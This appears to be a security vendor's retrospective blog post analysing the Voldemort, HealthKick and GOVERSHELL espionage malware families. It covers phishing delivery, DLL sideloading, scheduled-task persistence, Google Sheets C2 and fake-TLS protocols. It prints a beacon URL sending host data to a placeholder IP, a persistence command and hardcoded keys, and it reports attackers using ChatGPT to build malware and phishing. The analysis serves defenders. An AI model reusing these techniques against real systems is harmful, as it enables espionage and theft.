Revisiting Voldemort, HealthKick, and GOVERSHELL: A Technical Retrospective
| May 20, 2026
Key Takeaways
- Three malware strains (Voldemort, HealthKick, GOVERSHELL) linked to Chinese state-sponsored espionage from mid-2024 to late 2025.
- Targeted entities were Taiwanese semiconductor companies and international think tanks through spear-phishing and DLL sideloading.
- Unique characteristics of Voldemort involve leveraging Google Sheets as a C2 server, mixing its network traffic with Google Workspace services.
- GOVERSHELL, after its first variant HealthKick, changed its C2 stack five times within five months, suggesting involvement of LLMs in coding.
- OpenAI stated that ChatGPT was used by the adversary in creating certain components of the attack.
- Picus Security Validation Platform validates organizations' defenses against Voldemort, HealthKick, and GOVERSHELL malware families.
Three malware families related to espionage operations by Chinese-linked threat actors surfaced between mid-2024 and late 2025. With some time now having elapsed since then and the situation having settled down, it seems appropriate to look back on the technical details of these toolkits together, which have been used to launch attacks against specific targets like Taiwan's semiconductor manufacturers and think tanks across the globe.
In this blog post, we review the delivery, infection techniques, persistence, and C2 architecture employed by these three malware families.
Background: The Three Families and Their Relation
Before we delve into discussing the specifics of each malware family, it might be helpful to provide some context regarding the relation between them.
The first and oldest of the three malware families in question is Voldemort, which was first discovered in August 2024. It represents a unique custom backdoor characterized by the unusual implementation of Google Sheets as its C2 server.
The second malware family under discussion is HealthKick, which was discovered in April 2025. In fact, HealthKick proved to be nothing more than the first version of a wider range of malware, called GOVERSHELL. To put it simply, HealthKick is actually GOVERSHELL v1, coded in C++ and replaced with a fully redesigned GOVERSHELL v2 to v5 variants written in Go.
Altogether, there are five different versions of this malware, each of which uses different C2 communication protocol and encryption algorithms.
It's also important to note that all three malware families are distributed via spear-phishing emails and abuse DLL sideloading technique.
Part 1: Voldemort
Delivery Chain
Voldemort's infection chain is arguably the most elaborate of the three. At a high level:
|
Phishing Email |
Google AMP Cache is a caching proxy server for serving webpages belonging to Google's accelerated mobile pages infrastructure. Being a legitimate feature of the system, it is abused by malicious actors because the initial URL redirects to a google.com subdomain, thus bypassing simple URL filters.
First, the landing page performed a User Agent check. If the agent string included windows, the victim would be redirected to a search: URI. Otherwise, they would receive an empty URL that directed to Google Drive, which is a dead end.
When opening a search: URI, Windows silently starts Windows Explorer with the search parameters encoded in the URI, without showing any download prompts or file downloads.
The attackers used this behavior to redirect Windows Explorer to a WebDAV share hosted on TryCloudflare. This service provided a tunnel for accessing the contents of the attacker-controlled site [1]:
|
File: <redacted> This is a commonly known social engineering technique: the file appears to be a regular PDF document (with an appropriate icon and no lnk extension visible by default), but it's actually located on a remote WebDAV share. |
If the LNK is executed, it will launch:
powershell.exe → Python.exe (from \library\ WebDAV share) → script (from \resource\ WebDAV share).
Initial Reconnaissance
After starting, it gathers basic information about the host and sends it through a GET request to a tracker service:
|
http://<tracking-IP>/p/.../stage2-2/<base64-encoded-host-info> |
Then it downloads and displays a decoy PDF that is relevant to the target region.
DLL Sideloading
The real payload is a password-protected ZIP file downloaded from a file hosting service and unpacked to %localappdata%\Microsoft\Windows\. It includes two files:
- CiscoCollabHost.exe – a legitimate Cisco Webex executable, susceptible to DLL sideloading
- CiscoSparkLauncher.dll – the malicious DLL
When CiscoCollabHost.exe runs, it tries to find CiscoSparkLauncher.dll first in its own folder, and only after that in the system folder, the expected behavior on Windows. The malicious DLL has a SparkEntryPoint function exported, which is invoked by the binary.
The DLL’s SparkEntryPoint function starts with a sleep of about 5-10 minutes for sandbox evasion. Most automated sandboxing solutions time out before this period elapses, and therefore, any dynamic analysis will not detect any malicious network activity.
Command and Control: Google Sheets
Voldemort authenticates to the Google OAuth2 endpoint using the hardcoded client ID, client secret, and refresh token embedded in its encrypted configuration. The RC4 encryption key used by the malware for the configuration is the filename of the executable, CiscoCollabHost.exe.
The malware performs both write operations and read operations on a particular Google Sheet that acts as the C2 panel:
- Victim registration: Voldemort iterates through cells A1, A2, A3… until it encounters an empty cell and writes victim host info (encoded to base64 and RC4-encrypted) into that cell. Every row corresponds to a single victim.
- Command polling: The attacker writes commands into the Sheet; the malware reads those commands and executes them.
File upload/download, arbitrary command execution, copy, move, sleep, and exit are among the available commands. These constitute a fairly comprehensive set of backdoor capabilities.
The malware sends its traffic to sheets.googleapis.com port 443, making it virtually impossible to distinguish from regular enterprise Google Workspace traffic in network logs.
Part 2: HealthKick (GOVERSHELL Variant 1)
HealthKick is the earliest known iteration of what would later become the GOVERSHELL family, dating back to April 2025. The malware is written in C++ and delivered in phishing attacks aimed at financial analysts specializing in the Taiwanese semiconductor industry.
Delivery
HealthKick was distributed using phishing emails impersonating investment research cooperation requests from fake financial consultancy companies. The email contained a PDF attachment redirecting to a ZIP archive uploaded to a legitimate file-sharing website. The ZIP archive included:
- Loader – a legitimate binary vulnerable to DLL sideloading
- libcef.dll – the malicious HealthKick DLL
In this instance, the exploited binary was adobe_licensing_wf_helper.exe, which loads libcef.dll from its current directory.
Persistence
Upon first execution, HealthKick creates a randomly named directory under C:\ProgramData\ and copies itself into it. Then, it creates a scheduled task [2]:
|
schtasks.exe /Create /TN "SystemHealthMonitor" /TR "\"malware_binary.exe" -run" /SC MINUTE /MO 5 /F |
The -run command-line option is checked at the start of the malware's execution. If the flag isn't present, the malware recognizes that it's the first run, schedules the task and quits without doing anything else [3]. This is a sandbox evasion technique since automated sandboxes execute the malware only once.
C2 Protocol: Double Fake TLS
HealthKick's C2 traffic is wrapped in a fake TLS 1.2 header. However, the header is doubled. Furthermore, the payload is XOR-encoded with the hardcoded key mysecretkey [3].
|
[17 03 03 <LEN>] [17 03 03 <LEN>] [XOR-encoded payload] |
Part 3: GOVERSHELL: A Family in Rapid Flux
GOVERSHELL refers to five distinct variants of backdoors developed from April to September 2025.
They have similar design philosophies: DLL sideloading through Tablacus Explorer, scheduling tasks, executing PowerShell commands, although the network stack code underwent a total rewrite almost every time there was a new variant. This tendency to rewrite the code in its entirety (instead of simply updating it) was considered circumstantial evidence of LLM-assisted development, an issue that will be examined later.
Common Architecture
All variants of GOVERSHELL (excluding the first variant, HealthKick) use Tablacus Explorer, a legitimate file manager, as their delivery mechanism through DLL sideloading. By launching the executable, the search order in Tablacus Explorer loads the lib\te64.dll file before any copy of the same file from the system
The malware establishes persistence via creating a scheduled task called MyGoTask (or UPnPHostUpdater in some later variants) via Windows COM interface instead of schtasks.exe command line utility:
|
Task name: MyGoTask |
The cuVn value is the flag required for the malware to activate its C2 functionality. The absence of this flag (first run) leads to installation of persistence and clean exit.
C2 Evolution: Variant 1 to 5
Within five months, from April to September 2025, GOVERSHELL had to rewrite its C2 logic almost from scratch five times [3].
Variant 1 (HealthKick) had a reverse TCP shell (CMD) to port 465 wrapped in double TLS 1.2 header due to what looks like an error, as we mentioned above.
In Variant 2, this issue was fixed; the malware also started encrypting the payload via AES-CFB with the key supersecretkey16 and executing commands via PowerShell, although the connection was still a persistent reverse shell.
Variant 3 abandoned the reverse shell concept and adopted a much more sophisticated HTTP poll/beacon scheme, where the malware periodically took commands to be executed using GET and sent answers via POST in JSON format.
Variant 4 used WebSocket instead of HTTP while implementing session key negotiation in AES-GCM and varying the master key for each compiled sample.
Finally, Variant 5 returned to HTTP but with configurable jitter and sleep periods.
This path goes from noisy, buggy reverse shell to stealthy, encrypted beacon in about five months.
LLM-Assisted Malware and Phishing Campaigns
It was observed by security analysts during the study of the GOVERSHELL campaigns that the attacker was likely assisted by LLMs during malware development and phishing email creation. Let’s look at the strong evidence.
The first type of evidence is a non-iterative malware code update pattern. Typically, human-made malware evolves iteratively, with bugs being fixed and new functionality being added to the existing base. The GOVERSHELL family, however, replaces its network stack every time with a new protocol. This is more characteristic of a prompt-and-answer approach, where the attacker repeatedly prompts the AI to create an implementation of a backdoor using X protocol.
Also, the Word document used as a decoy during the attack carried metadata showing that the document had been created using libraries typical for AI-generated .docx files.
Phishing emails were a different story. They were fluent in several languages (English, Chinese, Japanese, French, and German), but often contained inconsistent messages with the subject in one language and body in another. Finally, an email could simultaneously contain three distinct personas in sender name, friendly name, and message signature. OpenAI later confirmed that ChatGPT was used by the attacker to generate some parts of the campaign.
How Picus Simulates Voldemort, HealthKick, and GOVERSHELL Attacks?
We also strongly suggest simulating Voldemort, HealthKick, and GOVERSHELL Attacks to test the effectiveness of your security controls against real-life cyber attacks using the Picus Security Validation Platform. You can also test your defenses against hundreds of other malware variants, such as BRICKSTORM, VenomRAT, Chinotto, and Rustonotto, within minutes with a 14-day free trial of the Picus Platform.
Picus Threat Library includes the following threats for the Voldemort, HealthKick, and GOVERSHELL Attacks:
|
Threat ID |
Threat Name |
Attack Module |
|
66703 |
Voldemort Loader Email Threat |
E-mail Infiltration |
|
97485 |
Voldemort Loader Download Threat |
Network Infiltration |
|
61854 |
HealthKick Backdoor Malware Email Threat |
E-mail Infiltration |
|
42376 |
HealthKick Backdoor Malware Download Threat |
Network Infiltration |
|
73708 |
GOVERSHELL Backdoor Malware Download Threat |
Network Infiltration |
|
33964 |
GOVERSHELL Backdoor Malware Email Threat |
E-mail Infiltration |
Start simulating emerging threats today and get actionable mitigation insights with a 14-day free trial of the Picus Security Validation Platform.
References
[1] “New Voldemort Malware Espionage Campaign,” Proofpoint. Accessed: May 19, 2026. [Online]. Available: https://www.proofpoint.com/us/blog/threat-insight/malware-must-not-be-named-suspected-espionage-campaign-delivers-voldemort
[2] “Phish and Chips: China-Aligned Espionage Actors Ramp Up Taiwan Semiconductor Industry Targeting,” Proofpoint. Accessed: May 19, 2026. [Online]. Available: https://www.proofpoint.com/us/blog/threat-insight/phish-china-aligned-espionage-actors-ramp-up-taiwan-semiconductor-targeting
[3] S. Adair, “APT Meets GPT: Targeted Operations with Untamed LLMs,” Volexity. Accessed: May 19, 2026. [Online]. Available: https://www.volexity.com/blog/2025/10/08/apt-meets-gpt-targeted-operations-with-untamed-llms/
